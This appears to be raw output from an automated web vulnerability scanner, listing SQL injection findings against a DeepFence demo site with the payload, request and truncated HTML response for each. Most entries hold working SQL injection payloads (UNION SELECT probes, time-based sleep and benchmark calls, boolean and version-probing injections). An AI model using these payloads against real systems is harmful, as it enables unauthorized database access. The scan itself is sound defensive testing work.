href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1121\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.io') or sleep(5)='\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1122\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1123\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioHAVING 1=1--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1124\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@\ndeepfence.ioor pg_SLEEP(5)\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.ioCWE-ID CWE-89\nIssue Number #1125\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io admin') or ('1'='1'/*\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1126\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\ndemouser@deepfence.io UNION ALL SELECT 1,2,3,4,5,6\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script language=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter demouser@\ndeepfence.io\nCWE-ID CWE-89\nIssue Number #1127\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '-'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1128\nScan SQL Injection\nSeverity ERROREndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# and (select substring(@@version,2,1))='i'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1129\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 4--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...Alerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1130\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# benchmark(50000000,MD5(1))\n#\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1131\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ' or ''&'\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: Response is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1132\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# '--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1133Scan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# UNION ALL SELECT \n1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/\npng\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1134\nScan SQL Injection\nSeverity ERROR\nEndpoint https://deepfence.show/\nRequest GET https://deepfence.show/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nDemoUser1# ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),\n4,5,6,7,8,9,10,11,12,13,14,15--\nResponseContent-type: text/html; charset=UTF-8\n7785 Content length: \nResponse is too big. Beginning of the response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <!-- Required meta tags --> <title\n>DeepFence</title> <meta charset=\"utf-8\"> <meta name=\"viewport\" content=\"\nwidth=device-width, initial-scale=1, shrink-to-fit=no\"> <script src=\"/\ncdn-cgi/apps/head/loFQ1Z6Js1J4MHXKX0-rl81O2OQ.js\"></script><script \nlanguage=\"javascript\"> window.__DF_CSRF_TOKEN = \"$__CSRF_TOKEN_PLACEHOLDER\n__\"; </script> <!-- Start of Zendesk Widget script --> <!-- <script id=\"\nze-snippet\" src=\"https://static.zdassets.com/ekr/snippet.js?key=c377ac9e-\n9a0a-4c32-aed4-bfb86b515320\"> </script> --> <!-- End of Zendesk Widget \nscript --> <!-- Bootstrap CSS --> <link rel=\"shortcut icon\" type=\"image/png\" href=\"data:image/png;base64,\niVBORw0KGgoAAAANSUhEUgAAACAAAAAgCAYAAABzenr0AAAAGXRFWHRTb2Z0d2FyZQBBZG9iZS\nBJbWFnZVJlYWR5ccllPAAACaxJREFUeNqsV1tsXNUV3fvcc1/\nz8ozHHjt2HNsJdmLyMGpjglEpoRWvNhCpRa1UAVLhg48Wif5U6oMvkPrDV6la8VFohfrRFrWCg\nAQIoqIkiLwKcYJDHMexE789k3nP3Nc5p/vOmCStnTagjn11x54zZ6+\nz9tp77YtKKQhfvzmyBCUBcG6pDp1JAz6ercP+oSRkXQE1R8DlgguFqg93Dy...\nAlerts Sensitive Information Exposure: [Version x.y.z] Exposing version numbers gives unnecessary\nhints on your systems vulnerabilities - Token [(?s).*\\w+/\\d{1,2}(\\.\\d{1,3})+.*] found [3/3.5.16]\nAction Points You may need to remove SQL tokens from the contents of the parameter DemoUser1#\nCWE-ID CWE-89\nIssue Number #1135\nScan SQL Injection\nSeverity 